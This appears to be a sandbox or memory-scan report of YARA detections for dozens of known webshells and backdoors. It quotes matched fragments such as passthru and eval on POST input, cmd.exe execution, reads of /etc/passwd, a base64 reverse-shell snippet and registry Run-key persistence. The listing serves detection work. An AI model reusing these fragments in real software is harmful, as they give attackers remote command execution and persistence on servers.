| 00000012.00000002.594455536.000000000437E000.00000004.00000001.sdmp | WebShell_zehir4_asp_php | PHP Webshells Github Archive - file zehir4.asp.php.txt | Florian Roth | - 0x45d86:$s4: response.Write "<title>zehir3 --> powered by zehir <zehirhacker@hotmail.com&
- 0x45c1c:$s11: frames.byZehir.document.execCommand(
- 0x45ddb:$s11: frames.byZehir.document.execCommand(
- 0x45e05:$s11: frames.byZehir.document.execCommand(
- 0x45c1c:$s15: frames.byZehir.document.execCommand(co
- 0x45e05:$s15: frames.byZehir.document.execCommand(co
|
| 00000012.00000002.594455536.000000000437E000.00000004.00000001.sdmp | WebShell_php_webshells_lostDC | PHP Webshells Github Archive - file lostDC.php | Florian Roth | - 0x45f03:$s0: $info .= '[~]Server: ' .$_SERVER['HTTP_HOST'] .'<br />';
- 0x45f40:$s4: header ( "Content-Description: Download manager" );
- 0x45f78:$s5: print "<center>[ Generation time: ".round(getTime()-startTime,4)." second
- 0x45fc6:$s9: if (mkdir($_POST['dir'], 0777) == false) {
- 0x45ff6:$s12: $ret = shellexec($command);
|
| 00000012.00000002.594455536.000000000437E000.00000004.00000001.sdmp | WebShell_CasuS_1_5 | PHP Webshells Github Archive - file CasuS 1.5.php | Florian Roth | - 0x460e1:$s2: <font size='+1'color='#0000FF'><u>CasuS 1.5'in URL'si</u>: http://$HTTP_HO
- 0x46130:$s8: $fonk_kap = get_cfg_var("fonksiyonlary_kapat");
- 0x46165:$s18: if (file_exists("F:\\")){
|
| 00000012.00000002.594455536.000000000437E000.00000004.00000001.sdmp | WebShell_ftpsearch | PHP Webshells Github Archive - file ftpsearch.php | Florian Roth | - 0x4624e:$s0: echo "[-] Error : coudn't read /etc/passwd";
- 0x4627f:$s9: @$ftp=ftp_connect('127.0.0.1');
- 0x462a4:$s12: echo "<title>Edited By KingDefacer</title><body>";
- 0x462dc:$s19: echo "[+] Founded ".sizeof($users)." entrys in /etc/passwd\n";
|
| 00000012.00000002.594455536.000000000437E000.00000004.00000001.sdmp | WebShell__Cyber_Shell_cybershell_Cyber_Shell__v_1_0_ | PHP Webshells Github Archive - from files Cyber Shell.php, cybershell.php, Cyber Shell (v 1.0).php | Florian Roth | - 0x464a7:$s4: <a href="http://www.cyberlords.net" target="_blank">Cyber Lords Community</
- 0x464f9:$s10: echo "<meta http-equiv=Refresh content=\"0; url=$PHP_SELF?edit=$nameoffile&sh
- 0x4654c:$s11: * Coded by Pixcher
- 0x46567:$s16: <input type=text size=55 name=newfile value="$d/newfile.php">
|
| 00000012.00000002.594455536.000000000437E000.00000004.00000001.sdmp | WebShell__Ajax_PHP_Command_Shell_Ajax_PHP_Command_Shell_soldierofallah | PHP Webshells Github Archive - from files Ajax_PHP Command Shell.php, Ajax_PHP_Command_Shell.php, soldierofallah.php | Florian Roth | - 0x46755:$s1: 'Read /etc/passwd' => "runcommand('etcpasswdfile','GET')",
- 0x46794:$s2: 'Running processes' => "runcommand('ps -aux','GET')",
- 0x467ce:$s3: $dt = $_POST['filecontent'];
- 0x467ef:$s4: 'Open ports' => "runcommand('netstat -an | grep -i listen','GET')",
- 0x46837:$s6: print "Sorry, none of the command functions works.";
- 0x46871:$s11: document.cmdform.command.value='';
- 0x46899:$s12: elseif(isset($_GET['savefile']) && !empty($_POST['filetosave']) && !empty($_POST
|
| 00000012.00000002.594455536.000000000437E000.00000004.00000001.sdmp | WebShell_Generic_PHP_7 | PHP Webshells Github Archive - from files Mysql interface v1.0.php, MySQL Web Interface Version 0.8.php, Mysql_interface_v1.0.php, MySQL_Web_Interface_Version_0.8.php | Florian Roth | - 0x46a41:$s0: header("Content-disposition: filename=$filename.sql");
- 0x46a7c:$s1: else if( $action == "dumpTable" || $action == "dumpDB" ) {
- 0x46abb:$s2: echo "<font color=blue>[$USERNAME]</font> - \n";
- 0x46af0:$s4: if( $action == "dumpTable" )
|
| 00000012.00000002.594455536.000000000437E000.00000004.00000001.sdmp | WebShell__Small_Web_Shell_by_ZaCo_small_zaco_zacosmall | PHP Webshells Github Archive - from files Small Web Shell by ZaCo.php, small.php, zaco.php, zacosmall.php | Florian Roth | - 0x46cd1:$s2: if(!$result2)$dump_file.='#error table '.$rows[0];
- 0x46d08:$s4: if(!(@mysql_select_db($db_dump,$mysql_link)))echo('DB error');
- 0x46d4b:$s6: header('Content-Length: '.strlen($dump_file)."\n");
- 0x46d84:$s20: echo('Dump for '.$db_dump.' now in '.$to_file);
|
| 00000012.00000002.594455536.000000000437E000.00000004.00000001.sdmp | WebShell_Generic_PHP_8 | PHP Webshells Github Archive - from files Macker\'s Private PHPShell.php, PHP Shell.php, Safe0ver Shell -Safe Mod Bypass By Evilc0der.php | Florian Roth | - 0x46edc:$s1: elseif ( $cmd=="file" ) { /* View a file in text --> */
- 0x41258:$s2: elseif ( $cmd=="upload" ) { /* Upload File form --> */
- 0x46f1d:$s2: elseif ( $cmd=="upload" ) { /* Upload File form --> */
- 0x46f5e:$s3: /* I added this to ensure the script will run correctly...
- 0x46f9e:$s14: </form> -->
- 0x2284d:$s15: <form action=\"$SFileName?$urlAdd\" method=\"POST\">
- 0x36819:$s15: <form action=\"$SFileName?$urlAdd\" method=\"POST\">
- 0x46fb9:$s15: <form action=\"$SFileName?$urlAdd\" method=\"POST\">
- 0x46ff3:$s20: elseif ( $cmd=="downl" ) { /* Save the edited file back to a file --> */
|
| 00000012.00000002.594455536.000000000437E000.00000004.00000001.sdmp | WebShell__PH_Vayv_PHVayv_PH_Vayv_klasvayv_asp_php | PHP Webshells Github Archive - from files PH Vayv.php, PHVayv.php, PH_Vayv.php, klasvayv.asp.php.txt | Florian Roth | - 0x471fa:$s1: <font color="#000000">Sil</font></a></font></td>
- 0x4722f:$s5: <td width="122" height="17" bgcolor="#9F9F9F">
- 0x47262:$s6: onfocus="if (this.value == 'Kullan
- 0x4728a:$s16: <img border="0" src="http://www.aventgrup.net/arsiv/klasvayv/1.0/2.gif">
|
| 00000012.00000002.594455536.000000000437E000.00000004.00000001.sdmp | WebShell_Generic_PHP_9 | PHP Webshells Github Archive - from files KAdot Universal Shell v0.1.6.php, KAdot_Universal_Shell_v0.1.6.php, KA_uShell 0.1.6.php | Florian Roth | - 0x47460:$s2: :<b>" .base64_decode($_POST['tot']). "</b>";
- 0x47491:$s6: if (isset($_POST['wq']) && $_POST['wq']<>"") {
- 0x474c5:$s12: if (!empty($_POST['c'])){
- 0x474e4:$s13: passthru($_POST['c']);
- 0x47500:$s16: <input type="radio" name="tac" value="1">B64 Decode<br>
- 0x4753d:$s20: <input type="radio" name="tac" value="3">md5 Hash
|
| 00000012.00000002.594455536.000000000437E000.00000004.00000001.sdmp | WebShell__PH_Vayv_PHVayv_PH_Vayv | PHP Webshells Github Archive - from files PH Vayv.php, PHVayv.php, PH_Vayv.php | Florian Roth | - 0x476d3:$s4: <form method="POST" action="<?echo "PHVayv.php?duzkaydet=$dizin/$duzenle
- 0x47721:$s12: <? if ($ekinci=="." or $ekinci=="..") {
- 0x4774f:$s17: name="duzenx2" value="Klas
|
| 00000012.00000002.594455536.000000000437E000.00000004.00000001.sdmp | WebShell_Generic_PHP_1 | PHP Webshells Github Archive - from files Dive Shell 1.0 - Emperor Hacking Team.php, Dive_Shell_1.0_Emperor_Hacking_Team.php, SimShell 1.0 - Simorgh Security MGZ.php, SimShell_1.0_-_Simorgh_Security_MGZ.php | Florian Roth | - 0x478dd:$s1: $token = substr($_REQUEST['command'], 0, $length);
- 0x47914:$s4: var command_hist = new Array(<?php echo $js_command_hist ?>);
- 0x47956:$s7: $_SESSION['output'] .= htmlspecialchars(fgets($io[1]),
- 0x47991:$s9: document.shell.command.value = command_hist[current_line];
- 0x479d1:$s16: $_REQUEST['command'] = $aliases[$token] . substr($_REQUEST['command'], $
- 0x47a1f:$s19: if (empty($_SESSION['cwd']) || !empty($_REQUEST['reset'])) {
- 0x47a61:$s20: if (e.keyCode == 38 && current_line < command_hist.length-1) {
|
| 00000012.00000002.594455536.000000000437E000.00000004.00000001.sdmp | WebShell_Generic_PHP_2 | PHP Webshells Github Archive - from files CrystalShell v.1.php, load_shell.php, Loaderz WEB Shell.php, stres.php | Florian Roth | - 0x47c4b:$s3: if((isset($_POST['fileto']))||(isset($_POST['filefrom'])))
- 0x47c8a:$s4: \$port = {$_POST['port']};
- 0x47ca9:$s5: $_POST['installpath'] = "temp.pl";}
- 0x47cd2:$s14: if(isset($_POST['post']) and $_POST['post'] == "yes" and @$HTTP_POST_FILES["u
- 0x47d25:$s16: copy($HTTP_POST_FILES["userfile"]["tmp_name"],$HTTP_POST_FILES["userfile"]
|
| 00000012.00000002.594455536.000000000437E000.00000004.00000001.sdmp | WebShell__CrystalShell_v_1_erne_stres | PHP Webshells Github Archive - from files CrystalShell v.1.php, erne.php, stres.php | Florian Roth | - 0x47ede:$s1: <input type='submit' value=' open (shill.txt) '>
- 0x47f14:$s4: var_dump(curl_exec($ch));
- 0x47f32:$s7: if(empty($_POST['Mohajer22'])){
- 0x47f57:$s10: $m=$_POST['curl'];
- 0x47f6f:$s13: $u1p=$_POST['copy'];
- 0x47f89:$s14: if(empty(\$_POST['cmd'])){
- 0x47fa9:$s15: $string = explode("|",$string);
- 0x47fce:$s16: $stream = imap_open("/etc/passwd", "", "");
|
| 00000012.00000002.594455536.000000000437E000.00000004.00000001.sdmp | WebShell_Generic_PHP_3 | PHP Webshells Github Archive - from files Antichat Shell v1.3.php, Antichat Shell. Modified by Go0o$E.php, Antichat Shell.php, fatal.php | Florian Roth | - 0x48151:$s0: header('Content-Length:'.filesize($file).'');
- 0x48183:$s4: <textarea name=\"command\" rows=\"5\" cols=\"150\">".@$_POST['comma
- 0x481cb:$s7: if(filetype($dir . $file)=="file")$files[]=$file;
- 0x48202:$s14: elseif (($perms & 0x6000) == 0x6000) {$info = 'b';}
- 0x4823c:$s20: $info .= (($perms & 0x0004) ? 'r' : '-');
|
| 00000012.00000002.594455536.000000000437E000.00000004.00000001.sdmp | WebShell_Generic_PHP_4 | PHP Webshells Github Archive - from files CrystalShell v.1.php, load_shell.php, nshell.php, Loaderz WEB Shell.php, stres.php | Florian Roth | - 0x3c78c:$s0: if ($filename != "." and $filename != ".."){
- 0x4844c:$s0: if ($filename != "." and $filename != ".."){
- 0x4847d:$s2: $owner["write"] = ($mode & 00200) ? 'w' : '-';
- 0x48c5e:$s2: $owner["write"] = ($mode & 00200) ? 'w' : '-';
- 0x484b0:$s5: $owner["execute"] = ($mode & 00100) ? 'x' : '-';
- 0x484e5:$s6: $world["write"] = ($mode & 00002) ? 'w' : '-';
- 0x48518:$s7: $world["execute"] = ($mode & 00001) ? 'x' : '-';
- 0x48c93:$s7: $world["execute"] = ($mode & 00001) ? 'x' : '-';
- 0x4854e:$s10: foreach ($arr as $filename) {
- 0x48571:$s19: else if( $mode & 0x6000 ) { $type='b'; }
|
| 00000012.00000002.594455536.000000000437E000.00000004.00000001.sdmp | WebShell_GFS | PHP Webshells Github Archive - from files GFS web-shell ver 3.1.7 - PRiV8.php, Predator.php, GFS_web-shell_ver_3.1.7_-_PRiV8.php | Florian Roth | - 0x4871c:$s0: OKTsNCmNsb3NlKFNURE9VVCk7DQpjbG9zZShTVERFUlIpOw==";
- 0x48754:$s1: lIENPTk47DQpleGl0IDA7DQp9DQp9";
- 0x48778:$s2: Ow0KIGR1cDIoZmQsIDIpOw0KIGV4ZWNsKCIvYmluL3NoIiwic2ggLWkiLCBOVUxMKTsNCiBjbG9zZShm
|
| 00000012.00000002.594455536.000000000437E000.00000004.00000001.sdmp | WebShell__CrystalShell_v_1_sosyete_stres | PHP Webshells Github Archive - from files CrystalShell v.1.php, sosyete.php, stres.php | Florian Roth | - 0x4893d:$s1: A:visited { COLOR:blue; TEXT-DECORATION: none}
- 0x48970:$s4: A:active {COLOR:blue; TEXT-DECORATION: none}
- 0x489a2:$s11: scrollbar-darkshadow-color: #101842;
- 0x489cc:$s15: <a bookmark="minipanel">
- 0x489ea:$s16: background-color: #EBEAEA;
- 0x48a0a:$s18: color: #D5ECF9;
- 0x48a1f:$s19: <center><TABLE style="BORDER-COLLAPSE: collapse" height=1 cellSpacing=0 border
|
| 00000012.00000002.594455536.000000000437E000.00000004.00000001.sdmp | WebShell_Generic_PHP_10 | PHP Webshells Github Archive - from files Cyber Shell.php, cybershell.php, Cyber Shell (v 1.0).php, PHPRemoteView.php | Florian Roth | - 0x48c1f:$s2: $world["execute"] = ($world['execute']=='x') ? 't' : 'T';
- 0x48c5e:$s6: $owner["write"] = ($mode & 00200) ? 'w' : '-';
- 0x48c93:$s11: $world["execute"] = ($mode & 00001) ? 'x' : '-';
- 0x48cca:$s12: else if( $mode & 0xA000 )
- 0x48cea:$s17: $s=sprintf("%1s", $type);
- 0x48d0a:$s20: font-size: 8pt;
- 0x49f4e:$s20: font-size: 8pt;
|
| 00000012.00000002.594455536.000000000437E000.00000004.00000001.sdmp | WebShell_Generic_PHP_11 | PHP Webshells Github Archive - from files rootshell.php, Rootshell.v.1.0.php, s72 Shell v1.1 Coding.php, s72_Shell_v1.1_Coding.php | Florian Roth | - 0x48ed8:$s5: $filename = $backupstring."$filename";
- 0x48f03:$s6: while ($file = readdir($folder)) {
- 0x48f2a:$s7: if($file != "." && $file != "..")
- 0x48f50:$s9: $backupstring = "copy_of_";
- 0x48f71:$s10: if( file_exists($file_name))
- 0x48f93:$s13: global $file_name, $filename;
- 0x48fb6:$s16: copy($file,"$filename");
- 0x48fd4:$s18: <td width="49%" height="142">
|
| 00000012.00000002.594455536.000000000437E000.00000004.00000001.sdmp | WebShell__findsock_php_findsock_shell_php_reverse_shell | PHP Webshells Github Archive - from files findsock.c, php-findsock-shell.php, php-reverse-shell.php | Florian Roth | - 0x49182:$s1: // me at pentestmonkey@pentestmonkey.net
|
| 00000012.00000002.594455536.000000000437E000.00000004.00000001.sdmp | WebShell_Generic_PHP_6 | PHP Webshells Github Archive - from files c0derz shell [csh | unknown | - 0x49331:$s2: @eval(stripslashes($_POST['phpcode']));
- 0x4935d:$s5: echo shell_exec($com);
- 0x49378:$s7: if($sertype == "winda"){
- 0x49395:$s8: function execute($com)
- 0x493b1:$s12: echo decode(execute($cmd));
- 0x493d2:$s15: echo system($com);
|
| 00000012.00000002.594455536.000000000437E000.00000004.00000001.sdmp | Unpack_Injectt | Webshells Auto-generated - file Injectt.exe | Yara Bulk Rule Generator by Florian Roth | - 0x494a2:$s2: %s -Run -->To Install And Run The Service
- 0x494ed:$s3: %s -Uninstall -->To Uninstall The Service
- 0x49532:$s4: (STANDARD_RIGHTS_REQUIRED |SC_MANAGER_CONNECT |SC_MANAGER_CREATE_SERVICE |SC_MAN
|
| 00000012.00000002.594455536.000000000437E000.00000004.00000001.sdmp | HYTop_DevPack_fso | Webshells Auto-generated - file fso.asp | Yara Bulk Rule Generator by Florian Roth | - 0x4963f:$s0: PageFSO Below -->
- 0x4965a:$s1: theFile.writeLine("<script language=""vbscript"" runat=server>if request("""&cli
|
| 00000012.00000002.594455536.000000000437E000.00000004.00000001.sdmp | FeliksPack3___PHP_Shells_ssh | Webshells Auto-generated - file ssh.php | Yara Bulk Rule Generator by Florian Roth | - 0x49772:$s0: eval(gzinflate(str_rot13(base64_decode('
|
| 00000012.00000002.594455536.000000000437E000.00000004.00000001.sdmp | Debug_BDoor | Webshells Auto-generated - file BDoor.dll | Yara Bulk Rule Generator by Florian Roth | - 0x49853:$s1: \BDoor\
- 0x4c013:$s1: \BDoor\
- 0x52bcc:$s1: \BDoor\
- 0x16fd9:$s4: SOFTWARE\Microsoft\Windows\CurrentVersion\Run
- 0x4985f:$s4: SOFTWARE\Microsoft\Windows\CurrentVersion\Run
|
| 00000012.00000002.594455536.000000000437E000.00000004.00000001.sdmp | bin_Client | Webshells Auto-generated - file Client.exe | Yara Bulk Rule Generator by Florian Roth | - 0x49945:$s0: Recieved respond from server!!
- 0x49968:$s4: packet door client
- 0x4997f:$s5: input source port(whatever you want):
- 0x499a9:$s7: Packet sent,waiting for reply...
|
| 00000012.00000002.594455536.000000000437E000.00000004.00000001.sdmp | ZXshell2_0_rar_Folder_ZXshell | Webshells Auto-generated - file ZXshell.exe | Yara Bulk Rule Generator by Florian Roth | - 0x49a96:$s0: WPreviewPagesn
- 0x49aa9:$s1: DA!OLUTELY N
|
| 00000012.00000002.594455536.000000000437E000.00000004.00000001.sdmp | RkNTLoad | Webshells Auto-generated - file RkNTLoad.exe | Yara Bulk Rule Generator by Florian Roth | - 0x49b6e:$s1: $Info: This file is packed with the UPX executable packer http://upx.tsx.org $
- 0x4e8b9:$s1: $Info: This file is packed with the UPX executable packer http://upx.tsx.org $
- 0x49bc1:$s2: 5pur+virtu!
- 0x49d56:$s2: 5pur+virtu!
- 0x49bd1:$s3: ugh spac#n
- 0x49be0:$s4: xcEx3WriL4
- 0x49bef:$s5: runtime error
- 0x49c01:$s6: loseHWait.Sr.
- 0x49c13:$s7: essageBoxAw
- 0x49c23:$s8: $Id: UPX 1.07 Copyright (C) 1996-2001 the UPX Team. All Rights Reserved. $
|
| 00000012.00000002.594455536.000000000437E000.00000004.00000001.sdmp | binder2_binder2 | Webshells Auto-generated - file binder2.exe | Yara Bulk Rule Generator by Florian Roth | - 0x49d2c:$s0: IsCharAlphaNumericA
- 0x49d44:$s2: WideCharToM
- 0x49d54:$s4: g 5pur+virtu!
- 0x49d66:$s5: \syslog.en
- 0x49d75:$s6: heap7'7oqk?not=
- 0x49d89:$s8: - Kablto in
|
| 00000012.00000002.594455536.000000000437E000.00000004.00000001.sdmp | thelast_orice2 | Webshells Auto-generated - file orice2.php | Yara Bulk Rule Generator by Florian Roth | - 0x49e51:$s0: $aa = $_GET['aa'];
- 0x49e69:$s1: echo $aa;
|
| 00000012.00000002.594455536.000000000437E000.00000004.00000001.sdmp | FSO_s_sincap | Webshells Auto-generated - file sincap.php | Yara Bulk Rule Generator by Florian Roth | - 0x49f2d:$s0: <font color="#E5E5E5" style="font-size: 8pt; font-weight: 700" face="Arial">
- 0x49f82:$s4: <body text="#008000" bgcolor="#808080" topmargin="0" leftmargin="0" rightmargin=
|
| 00000012.00000002.594455536.000000000437E000.00000004.00000001.sdmp | PhpShell | Webshells Auto-generated - file PhpShell.php | Yara Bulk Rule Generator by Florian Roth | - 0x4a08b:$s2: href="http://www.gimpster.com/wiki/PhpShell">www.gimpster.com/wiki/PhpShell</a>.
|
| 00000012.00000002.594455536.000000000437E000.00000004.00000001.sdmp | HYTop_DevPack_config | Webshells Auto-generated - file config.asp | Yara Bulk Rule Generator by Florian Roth | - 0x4a19e:$s0: const adminPassword="
- 0x4a1b8:$s2: const userPassword="
- 0x4a1d1:$s3: const mVersion=
|
| 00000012.00000002.594455536.000000000437E000.00000004.00000001.sdmp | sendmail | Webshells Auto-generated - file sendmail.exe | Yara Bulk Rule Generator by Florian Roth | - 0x4a299:$s3: _NextPyC808
- 0x4a2a9:$s6: Copyright (C) 2000, Diamond Computer Systems Pty. Ltd. (www.diamondcs.com.au)
|
| 00000012.00000002.594455536.000000000437E000.00000004.00000001.sdmp | FSO_s_zehir4 | Webshells Auto-generated - file zehir4.asp | Yara Bulk Rule Generator by Florian Roth | |
| 00000012.00000002.594455536.000000000437E000.00000004.00000001.sdmp | hkshell_hkshell | Webshells Auto-generated - file hkshell.exe | Yara Bulk Rule Generator by Florian Roth | - 0x4a479:$s1: PrSessKERNELU
- 0x4a48b:$s2: Cur3ntV7sion
- 0x4a49c:$s3: Explorer8
|
| 00000012.00000002.594455536.000000000437E000.00000004.00000001.sdmp | iMHaPFtp | Webshells Auto-generated - file iMHaPFtp.php | Yara Bulk Rule Generator by Florian Roth | - 0x4a55e:$s1: echo "\t<th class=\"permission_header\"><a href=\"$self?{$d}sort=permission$r\">
|
| 00000012.00000002.594455536.000000000437E000.00000004.00000001.sdmp | Unpack_TBack | Webshells Auto-generated - file TBack.dll | Yara Bulk Rule Generator by Florian Roth | - 0x4a668:$s5: \final\new\lcc\public.dll
|
| 00000012.00000002.594455536.000000000437E000.00000004.00000001.sdmp | DarkSpy105 | Webshells Auto-generated - file DarkSpy105.exe | Yara Bulk Rule Generator by Florian Roth | - 0x4a73e:$s7: Sorry,DarkSpy got an unknown exception,please re-run it,thanks!
|
| 00000012.00000002.594455536.000000000437E000.00000004.00000001.sdmp | EditServer_Webshell | Webshells Auto-generated - file EditServer.exe | Yara Bulk Rule Generator by Florian Roth | - 0x4a83e:$s2: Server %s Have Been Configured
- 0x4a861:$s5: The Server Password Exceeds 32 Characters
- 0x4a88f:$s8: 9--Set Procecess Name To Inject DLL
|
| 00000012.00000002.594455536.000000000437E000.00000004.00000001.sdmp | FSO_s_reader | Webshells Auto-generated - file reader.asp | Yara Bulk Rule Generator by Florian Roth | - 0x4a96d:$s2: mailto:mailbomb@hotmail.
|
| 00000012.00000002.594455536.000000000437E000.00000004.00000001.sdmp | ASP_CmdAsp | Webshells Auto-generated - file CmdAsp.asp | Yara Bulk Rule Generator by Florian Roth | - 0x4aa3e:$s2: ' -- Read the output from our command and remove the temp file -- '
- 0x1c51b:$s6: Call oScript.Run ("cmd.exe /c " & szCMD & " > " & szTempFile, 0, True)
- 0x24943:$s6: Call oScript.Run ("cmd.exe /c " & szCMD & " > " & szTempFile, 0, True)
- 0x42548:$s6: Call oScript.Run ("cmd.exe /c " & szCMD & " > " & szTempFile, 0, True)
- 0x4aa86:$s6: Call oScript.Run ("cmd.exe /c " & szCMD & " > " & szTempFile, 0, True)
- 0x4c48e:$s6: Call oScript.Run ("cmd.exe /c " & szCMD & " > " & szTempFile, 0, True)
- 0x4aad1:$s9: ' -- create the COM objects that we will be using -- '
|
| 00000012.00000002.594455536.000000000437E000.00000004.00000001.sdmp | KA_uShell | Webshells Auto-generated - file KA_uShell.php | Yara Bulk Rule Generator by Florian Roth | - 0x4abc2:$s5: if(empty($_SERVER['PHP_AUTH_PW']) || $_SERVER['PHP_AUTH_PW']<>$pass
- 0x2b2ce:$s6: if ($_POST['path']==""){$uploadfile = $_FILES['file']['name'];}
- 0x4ac0a:$s6: if ($_POST['path']==""){$uploadfile = $_FILES['file']['name'];}
|
| 00000012.00000002.594455536.000000000437E000.00000004.00000001.sdmp | PHP_Backdoor_v1 | Webshells Auto-generated - file PHP Backdoor v1.php | Yara Bulk Rule Generator by Florian Roth | - 0x4ad10:$s5: echo"<form method=\"POST\" action=\"".$_SERVER['PHP_SELF']."?edit=".$th
- 0x4ad5c:$s8: echo "<a href=\"".$_SERVER['PHP_SELF']."?proxy
|
| 00000012.00000002.594455536.000000000437E000.00000004.00000001.sdmp | svchostdll | Webshells Auto-generated - file svchostdll.dll | Yara Bulk Rule Generator by Florian Roth | - 0x4ae47:$s0: InstallService
- 0x4ae5a:$s1: RundllInstallA
- 0x4ae6d:$s2: UninstallService
- 0x4ae82:$s3: &G3 Users In RegistryD
- 0x4ae9d:$s4: OL_SHUTDOWN;I
- 0x4aeaf:$s5: SvcHostDLL.dll
- 0x4aec2:$s6: RundllUninstallA
- 0x4aed7:$s7: InternetOpenA
- 0x4aee9:$s8: Check Cloneomplete
|
| 00000012.00000002.594455536.000000000437E000.00000004.00000001.sdmp | HYTop_DevPack_server | Webshells Auto-generated - file server.asp | Yara Bulk Rule Generator by Florian Roth | - 0x4afbe:$s0: PageServer Below -->
|
| 00000012.00000002.594455536.000000000437E000.00000004.00000001.sdmp | vanquish | Webshells Auto-generated - file vanquish.dll | Yara Bulk Rule Generator by Florian Roth | - 0x4b090:$s3: You cannot delete protected files/folders! Instead, your attempt has been logged
- 0x4b0e5:$s8: ?VCreateProcessA@@YGHPBDPADPAU_SECURITY_ATTRIBUTES@@2HKPAX0PAU_STARTUPINFOA@@PAU
- 0x4b13a:$s9: ?VFindFirstFileExW@@YGPAXPBGW4_FINDEX_INFO_LEVELS@@PAXW4_FINDEX_SEARCH_OPS@@2K@Z
|
| 00000012.00000002.594455536.000000000437E000.00000004.00000001.sdmp | winshell | Webshells Auto-generated - file winshell.exe | Yara Bulk Rule Generator by Florian Roth | - 0x4b243:$s0: Software\Microsoft\Windows\CurrentVersion\RunServices
- 0x4b27d:$s1: WinShell Service
- 0x4b292:$s2: __GLOBAL_HEAP_SELECTED
- 0x4b2ad:$s3: __MSVCRT_HEAP_SELECT
- 0x4b2c6:$s4: Provide Windows CmdShell Service
- 0x4b2eb:$s5: URLDownloadToFileA
- 0x4b302:$s6: RegisterServiceProcess
- 0x4b31d:$s7: GetModuleBaseNameA
- 0x4b334:$s8: WinShell v5.0 (C)2002 janker.org
|
| 00000012.00000002.594455536.000000000437E000.00000004.00000001.sdmp | FSO_s_remview | Webshells Auto-generated - file remview.php | Yara Bulk Rule Generator by Florian Roth | - 0x4b411:$s2: echo "<hr size=1 noshade>\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n"
- 0x4b466:$s3: echo "<script>str$i=\"".str_replace("\"","\\\"",str_replace("\\","\\\\"
- 0x4b4bb:$s4: echo "<hr size=1 noshade>\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n<
|
| 00000012.00000002.594455536.000000000437E000.00000004.00000001.sdmp | saphpshell | Webshells Auto-generated - file saphpshell.php | Yara Bulk Rule Generator by Florian Roth | - 0x4b5c8:$s0: <td><input type="text" name="command" size="60" value="<?=$_POST['command']?>
|
| 00000012.00000002.594455536.000000000437E000.00000004.00000001.sdmp | HYTop2006_rar_Folder_2006Z | Webshells Auto-generated - file 2006Z.exe | Yara Bulk Rule Generator by Florian Roth | - 0x4b6dd:$s1: wangyong,czy,allen,lcx,Marcos,kEvin1986,myth
- 0x4b70e:$s8: System\CurrentControlSet\Control\Keyboard Layouts\%.8x
|
| 00000012.00000002.594455536.000000000437E000.00000004.00000001.sdmp | admin_ad | Webshells Auto-generated - file admin-ad.asp | Yara Bulk Rule Generator by Florian Roth | - 0x4b7fd:$s6: <td align="center"> <input name="cmd" type="text" id="cmd" siz
- 0x4b840:$s7: Response.write"<a href='"&url&"?path="&Request("oldpath")&"&attrib="&attrib&"'><
|
| 00000012.00000002.594455536.000000000437E000.00000004.00000001.sdmp | FSO_s_casus15 | Webshells Auto-generated - file casus15.php | Yara Bulk Rule Generator by Florian Roth | - 0x4b94d:$s6: if((is_dir("$deldir/$file")) AND ($file!=".") AND ($file!=".."))
|
| 00000012.00000002.594455536.000000000437E000.00000004.00000001.sdmp | BIN_Client | Webshells Auto-generated - file Client.exe | Yara Bulk Rule Generator by Florian Roth | - 0x4ba46:$s0: =====Remote Shell Closed=====
- 0x4ba68:$s2: All Files(*.*)|*.*||
- 0x4ba81:$s6: WSAStartup Error!
- 0x4ba97:$s7: SHGetFileInfoA
- 0x4baaa:$s8: CreateThread False!
- 0x4bac2:$s9: Port Number Error
|
| 00000012.00000002.594455536.000000000437E000.00000004.00000001.sdmp | shelltools_g0t_root_uptime | Webshells Auto-generated - file uptime.exe | Yara Bulk Rule Generator by Florian Roth | - 0x4bb9c:$s0: JDiamondCSlC~
- 0x4bbae:$s1: CharactQA
- 0x4bbbc:$s2: $Info: This file is packed with the UPX executable packer $
- 0x5000e:$s2: $Info: This file is packed with the UPX executable packer $
- 0x4bbfc:$s5: HandlereateConso
- 0x4bc11:$s7: ION\System\FloatingPo
- 0x500a1:$s7: ION\System\FloatingPo
|
| 00000012.00000002.594455536.000000000437E000.00000004.00000001.sdmp | Simple_PHP_BackDooR | Webshells Auto-generated - file Simple_PHP_BackDooR.php | Yara Bulk Rule Generator by Florian Roth | - 0x4bcf5:$s0: <hr>to browse go to http://<? echo $SERVER_NAME.$REQUEST_URI; ?>?d=[directory he
- 0x24556:$s6: if(!move_uploaded_file($HTTP_POST_FILES['file_name']['tmp_name'], $dir.$fn
- 0x4bd4a:$s6: if(!move_uploaded_file($HTTP_POST_FILES['file_name']['tmp_name'], $dir.$fn
- 0x3fdc4:$s9: // a simple php backdoor
- 0x4bd99:$s9: // a simple php backdoor
|
| 00000012.00000002.594455536.000000000437E000.00000004.00000001.sdmp | sig_2005Gray | Webshells Auto-generated - file 2005Gray.asp | Yara Bulk Rule Generator by Florian Roth | - 0x4be6e:$s0: SCROLLBAR-FACE-COLOR: #e8e7e7;
- 0x4be91:$s4: echo " <a href=""/"&encodeForUrl(theHref,false)&""" target=_blank>"&replace
- 0x4c999:$s4: echo " <a href=""/"&encodeForUrl(theHref,false)&""" target=_blank>"&replace
- 0x4bee6:$s8: theHref=mid(replace(lcase(list.path),lcase(server.mapPath("/")),""),2)
- 0x4c9ee:$s8: theHref=mid(replace(lcase(list.path),lcase(server.mapPath("/")),""),2)
- 0x4bf31:$s9: SCROLLBAR-3DLIGHT-COLOR: #cccccc;
|
| 00000012.00000002.594455536.000000000437E000.00000004.00000001.sdmp | DllInjection | Webshells Auto-generated - file DllInjection.exe | Yara Bulk Rule Generator by Florian Roth | - 0x4c013:$s0: \BDoor\DllInjecti
|
| 00000012.00000002.594455536.000000000437E000.00000004.00000001.sdmp | Mithril_v1_45_Mithril | Webshells Auto-generated - file Mithril.exe | Yara Bulk Rule Generator by Florian Roth | - 0x4c0e9:$s2: cress.exe
- 0x4fb5f:$s2: cress.exe
- 0x4c0f7:$s7: \Debug\Mithril.
|
| 00000012.00000002.594455536.000000000437E000.00000004.00000001.sdmp | hkshell_hkrmv | Webshells Auto-generated - file hkrmv.exe | Yara Bulk Rule Generator by Florian Roth | - 0x4c1c1:$s5: /THUMBPOSITION7
- 0x4c1d5:$s6: \EvilBlade\
|
